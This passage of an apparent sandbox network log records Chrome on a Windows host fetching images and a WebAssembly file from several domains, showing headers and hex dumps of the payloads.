                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13569
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3501"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE8[11],EU-GER-frankfurt-GLOBAL1-CACHE6[0,TCP_HIT,10],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f6ca4792f3bd8c9facbcfa204fc83b7d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:07 UTC13569INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          290192.168.2.55004390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:06 UTC641OUTGET /pc/image-pc/video/dg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC625INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 19634
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4cb2"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE1[10],EU-GER-frankfurt-GLOBAL1-CACHE7[0,TCP_HIT,9],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: beb40ed15678fb7e738937519fa2a8fd
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:07 UTC15759INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:07 UTC3875INData Raw: f8 4e cb 32 67 22 47 6c a2 97 23 93 c9 e4 b2 33 e4 b2 f7 d7 39 4c 8d c3 ef b9 bd bc 99 e7 9a 43 e6 f2 39 66 63 4f 33 a2 a1 42 9d b0 09 4d 42 a8 c8 00 00 ec 11 95 6a bd 72 59 d8 92 78 93 33 ef 88 cc e2 e2 44 0c 04 43 b1 23 ae 9e 4e a3 ca 14 06 81 ce 11 2c 7e d3 8a 12 47 70 69 4d 43 0d 26 25 4e a1 17 38 e5 12 c7 2c a4 51 8b 05 a7 85 00 d5 aa 38 89 c5 3b 83 22 04 3b 12 3c d7 17 11 46 ca 36 9d d4 63 40 48 14 fd da 16 38 98 35 59 a8 88 a4 9d c3 bf 7f a6 a2 26 08 c0 3e 5a 64 e3 5b 1d a1 a5 40 e9 a9 9c 64 29 59 94 ab 0a 86 53 50 7e a3 ae a2 71 99 44 9c ba 64 dd e5 c8 5c 3f dd da 64 a4 f7 4d db d3 dc f7 07 42 19 54 fa 7f 66 96 a4 0e ef 28 bc f8 ae a3 c6 06 26 68 bf 43 95 0c 47 4a 8e bd 7c b5 26 21 01 cc 45 97 1f 82 46 b9 c8 b1 9c 44 2d 6c a4 95 1a 45 de 1c 86 45
                                                                                                                                                          Data Ascii: N2g"Gl#39LC9fcO3BMBjrYx3DC#N,~GpiMC&%N8,Q8;";<F6c@H85Y&>Zd[@d)YSP~qDd\?dMBTf(&hCGJ|&!EFD-lEE


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          291192.168.2.55004590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC617OUTGET /pc/image-pc/index/312/service/convenient_icon.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 8202
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:57 GMT
                                                                                                                                                          ETag: "5d71fe89-200a"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE14[296],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,295],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465113
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a331a340670987513241a0cd834caedd
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105839
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:07 UTC8202INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 44 00 00 00 4f 08 06 00 00 00 52 d4 63 71 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 1f 21 49 44 41 54 78 da c5 7c 79 9c 5c 55 b5 ee b7 d6 de 67 a8 aa ae 1e 32 90 84 41 06 03 97 ab a8 c8 e0 13 9f 22 0a 02 32 07 02 09 12 03 02 22 38 f0 bc 88 03 de 7b 7d e8 bb 38 80 03 8a 3c 40 88 20 84 79 50 46 15 01 e5 89 97 cb 55 40 65 10 c2 4c 02 09 99 ba bb ba 86 33 ec bd d6 fb e3 54 55 77 92 a6 81 d0 d1 c5 6f 53 a7 fa 54 ce de fb 5b 6b af bd a6 7d 08 13 12 83 c1 00 00 01 00 72 c5 9f 0d 60 05 10 69 ff 9d 23 a0 5a 05 a2
                                                                                                                                                          Data Ascii: PNGIHDRDORcqgAMAa cHRMz&u0`:pQ<bKGD!IDATx|y\Ug2A"2"8{}8<@ yPFU@eL3TUwoST[k}r`i#Z


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          292192.168.2.55004790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC616OUTGET /pc/image-pc/index/312/service/security_icon1.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 8108
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:58 GMT
                                                                                                                                                          ETag: "5d71fe8a-1fac"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[6],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,5],EU-GER-frankfurt-GLOBAL1-CACHE3[1135],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,1133],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465113
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e76692728554ab379c3aee6d7cf43edd
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105838
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:07 UTC8108INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4c 00 00 00 48 08 06 00 00 00 5c 06 13 3d 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 1e c3 49 44 41 54 78 da cd 9c 79 bc 65 57 55 e7 bf 6b ef 7d ce 1d de 7b f5 aa 5e 55 65 60 50 20 8a 40 a3 32 a8 dd d8 82 a2 e2 c0 18 86 10 20 21 21 40 80 24 40 98 5a 5a 5a 30 88 f6 47 04 82 4c 49 88 11 64 ca 40 13 06 09 20 42 23 6d 03 22 a1 41 10 99 44 a0 03 24 95 4a aa ea 8d 77 38 67 ef b5 fa 8f 7d ce bd f7 bd 7a 95 c1 54 f1 e9 9d cf ad fb ee cd b9 67 af bd f6 da 6b fd d6 74 84 3b 30 1c 50 8a a0 66 78 1c 43 df 87 f9 3d 3c
                                                                                                                                                          Data Ascii: PNGIHDRLH\=gAMAa cHRMz&u0`:pQ<bKGDIDATxyeWUk}{^Ue`P @2 !!@$@ZZZ0GLId@ B#m"AD$Jw8g}zTgkt;0PfxC=<


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          293192.168.2.550054188.114.96.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:07 UTC577OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:07 UTC836INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:07 GMT
                                                                                                                                                          Content-Type: application/wasm
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                          ETag: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sayIrMo0V%2FSPgvf%2BNnoeuuRA2HGMbvlmx52nD506IMM0KxNACPVXmlO83h1BOSc8C98jZjQij3kCbKy9i4IcIBruBvziiLhKlAdgVnDLn5sCZuayZvByr%2B%2FHocKM9RhcaRF99MZuWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0957cb12d3e-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:07 UTC533INData Raw: 37 63 36 64 0d 0a 00 61 73 6d 01 00 00 00 01 bc 01 1b 60 04 7f 7f 7f 7f 01 7f 60 02 7f 7f 00 60 00 00 60 01 7f 00 60 03 7f 7f 7f 00 60 01 7f 01 7f 60 02 7f 7f 01 7f 60 07 7f 7e 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 00 60 04 7f 7f 7f 7f 00 60 03 7f 7f 7f 01 7f 60 08 7f 7f 7f 7f 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 00 60 03 7f 7e 7f 00 60 02 7f 7e 00 60 00 01 7f 60 03 7f 7f 7f 01 7e 60 01 7e 01 7f 60 00 01 7c 60 03 7f 7f 7f 01 7c 60 05 7f 7e 7f 7f 7f 00 60 06 7e 7f 7f 7f 7f 7f 00 60 06 7f 7e 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 01 7f 60 02 7f 7c 00 60 07 7f 7f 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 01 7f 02 bc 02 0b 03 65 6e 76 0d 72 75 6e 74 69 6d 65 2e 74 69 63 6b 73 00 12 16 77 61 73 69 5f 73 6e 61 70 73 68 6f 74 5f 70 72 65 76 69 65 77 31 08 66 64
                                                                                                                                                          Data Ascii: 7c6dasm````````~``````~`~``~`~`|`|`~`~`~``|``envruntime.tickswasi_snapshot_preview1fd
                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 04 02 04 06 05 05 05 05 05 01 05 01 01 04 0c 02 02 02 08 06 0a 0a 09 08 0a 04 13 10 10 04 06 04 01 0d 0a 0e 01 03 03 02 02 02 00 00 00 05 04 03 00 03 02 03 02 03 01 01 03 02 14 15 11 11 0e 16 01 05 03 0f 03 01 05 07 01 07 07 07 07 07 00 06 09 0f 17 00 02 04 0c 06 0a 03 0b 00 04 00 01 0e 05 09 0c 04 04 05 00 0a 0d 0d 04 18 19 0b 09 05 03 06 06 02 02 02 03 02 03 0f 01 1a 04 05 01 70 01 0b 0b 05 03 01 00 02 06 12 03 7f 01 41 80 80 04 0b 7f 01 41 00 0b 7f 01 41 00 0b 07 cb 01 0d 06 6d 65 6d 6f 72 79 02 00 06 6d 61 6c 6c 6f 63 00 7e 04 66 72 65 65 00 7f 06 63 61 6c 6c 6f 63 00 80 01 07 72 65 61 6c 6c 6f 63 00 81 01 06 5f 73 74 61 72 74 00 82 01 06 72 65 73 75 6d 65 00 83 01 0c 67 6f 5f 73 63 68 65 64 75 6c 65 72 00 84 01 15 61 73 79 6e 63 69 66 79 5f 73 74 61
                                                                                                                                                          Data Ascii: pAAAmemorymalloc~freecallocrealloc_startresumego_schedulerasyncify_sta
                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 20 6a 24 00 0b 0f 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 01 36 02 04 20 04 20 02 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 20 04 20 08 36 02 1c 23 02 23 02 28 02 00 41 20 6a 36 02 00 0b c6 03 01 05 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 24 6b 36 02 00 23 02 28 02 00 22 06 28 02 00 21 00 20 06 28 02 04 21 01 20 06 28 02 08 21 02 20 06 28 02 0c 21 03 20 06 28 02 10 21 04 20 06 28 02 14 21 07 20 06 28 02 18 21 08 20 06 28 02 1c 21 09 20 06 28 02 20 21 06 0b 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 05 0b 23 01 45 04 40 23 00 41 20 6b 22 08 24 00 20 08 42 00 37 02 14
                                                                                                                                                          Data Ascii: j$!#( 6##(Aj6#(" 6 6 6 6 6 6 6 6##(A j6#AF@##(A$k6#("(! (! (! (! (! (! (! (! ( !#AF@##(Ak6#((!#E@#A k"$ B7
                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 01 36 02 00 20 01 20 07 6b 22 01 41 01 10 54 20 05 20 07 6b 41 02 6a 21 02 03 40 20 02 41 8c ad 05 28 02 00 47 04 40 20 02 41 02 10 54 20 02 41 01 6a 21 02 0c 01 0b 0b 20 01 41 04 74 41 b0 b2 05 6a 22 01 41 00 20 00 fc 0b 00 20 01 0f 0b 0b 20 08 41 03 46 41 01 23 01 1b 04 40 41 cc 87 04 41 0d 10 45 41 03 23 01 41 01 46 0d 04 1a 0b 23 01 45 04 40 00 0b 0b 20 06 41 00 23 01 1b 21 06 0b 23 01 45 04 40 41 8c ad 05 28 02 00 21 03 20 02 21 01 0c 01 0b 0b 00 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 02 36 02 04 20 04 20 01 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 23 02 23 02 28 02 00 41 1c 6a 36 02 00 41 00 0b c4 02 01 04 7f 23 01
                                                                                                                                                          Data Ascii: 6 k"AT kAj!@ A(G@ AT Aj! AtAj"A AFA#@AAEA#AF#E@ A#!#E@A(! !!#( 6##(Aj6#(" 6 6 6 6 6 6 6##(Aj6A#
                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 20 00 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 41 00 0b bb 01 01 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 08 6b 36 02 00 23 02 28 02 00 22 01 28 02 00 21 00 20 01 28 02 04 21 02 0b 02 7f 23 01 41 02 46 04 7f 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 05 41 00 0b 41 00 23 01 1b 45 04 40 20 00 10 19 41 00 23 01 41 01 46 0d 01 1a 21 02 0b 23 01 45 04 40 20 02 41 01 71 04 7f 20 00 28 02 08 05 20 00 0b 0f 0b 00 0b 21 01 23 02 28 02 00 20 01 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 01 20 00 36 02 00 20 01 20 02 36 02 04 23 02 23 02 28 02 00 41 08 6a 36 02 00 41 00 0b c3 01 01 01 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00
                                                                                                                                                          Data Ascii: ##(Aj6#( 6##(Aj6A#AF@##(Ak6#("(! (!#AF##(Ak6#((AA#E@ A#AF!#E@ Aq ( !#( 6##(Aj6#(" 6 6##(Aj6A#AF@##(Ak6
                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 20 01 10 19 41 00 23 01 41 01 46 0d 01 1a 21 03 0b 20 03 20 03 41 01 71 45 23 01 1b 21 03 02 40 02 40 02 40 23 01 45 04 40 20 03 45 04 40 20 02 41 08 6a 20 01 41 10 6a 10 1a 20 02 20 02 28 02 08 22 04 36 02 b4 05 20 02 20 04 36 02 b0 05 20 02 28 02 0c 22 09 45 22 01 0d 02 20 04 2d 00 00 41 2e 47 0d 04 20 09 41 01 6b 21 09 20 04 41 01 6a 21 04 0c 04 0b 20 01 45 0d 02 20 01 41 03 71 21 03 0b 02 40 02 40 02 40 02 40 02 40 02 40 02 40 23 01 45 04 40 20 03 0d 01 41 0c 21 09 41 90 86 04 21 04 02 40 20 01 2d 00 00 41 1f 71 22 0b 41 13 6b 22 03 0e 08 00 0b 02 03 04 0a 05 06 0a 0b 0b 20 06 41 01 46 41 01 23 01 1b 04 40 20 01 10 17 41 01 23 01 41 01 46 0d 0b 1a 21 04 0b 23 01 45 04 40 20 02 20 04 36 02 b8 05 20 02 41 c8 00 6a 21 03 0b 20 06 41 02 46 41 01 23 01 1b
                                                                                                                                                          Data Ascii: A#AF! AqE#!@@@#E@ E@ Aj Aj ("6 6 ("E" -A.G Ak! Aj! E Aq!@@@@@@@#E@ A!A!@ -Aq"Ak" AFA#@ A#AF!#E@ 6 Aj! AFA#
                                                                                                                                                          2024-06-09 22:41:07 UTC1369INData Raw: 01 41 01 46 0d 08 1a 21 0b 0b 23 01 45 04 40 20 02 20 0b 36 02 fc 05 20 02 41 f8 00 6a 21 01 0b 20 06 41 13 46 41 01 23 01 1b 04 40 20 01 20 0b 10 18 41 13 23 01 41 01 46 0d 08 1a 0b 23 01 45 04 40 20 02 20 02 28 02 78 22 0b 36 02 80 06 20 02 28 02 7c 21 03 20 02 41 f0 00 6a 21 01 0b 20 06 41 14 46 41 01 23 01 1b 04 40 20 01 20 04 20 09 20 0b 20 03 10 0d 41 14 23 01 41 01 46 0d 08 1a 0b 23 01 45 04 40 20 02 20 02 28 02 70 22 04 36 02 84 06 20 02 28 02 74 21 09 0c 07 0b 0b 20 06 41 15 46 41 01 23 01 1b 04 40 20 01 10 14 41 15 23 01 41 01 46 0d 07 1a 21 04 0b 23 01 45 04 40 20 02 20 04 36 02 8c 06 20 02 20 04 36 02 90 06 20 02 20 04 36 02 88 06 20 04 45 20 04 41 03 71 72 0d 02 20 04 2d 00 00 41 1f 71 41 19 47 0d 02 20 02 20 04 28 02 0c 22 04 36 02 94 06 20
                                                                                                                                                          Data Ascii: AF!#E@ 6 Aj! AFA#@ A#AF#E@ (x"6 (|! Aj! AFA#@ A#AF#E@ (p"6 (t! AFA#@ A#AF!#E@ 6 6 6 E Aqr -AqAG ("6
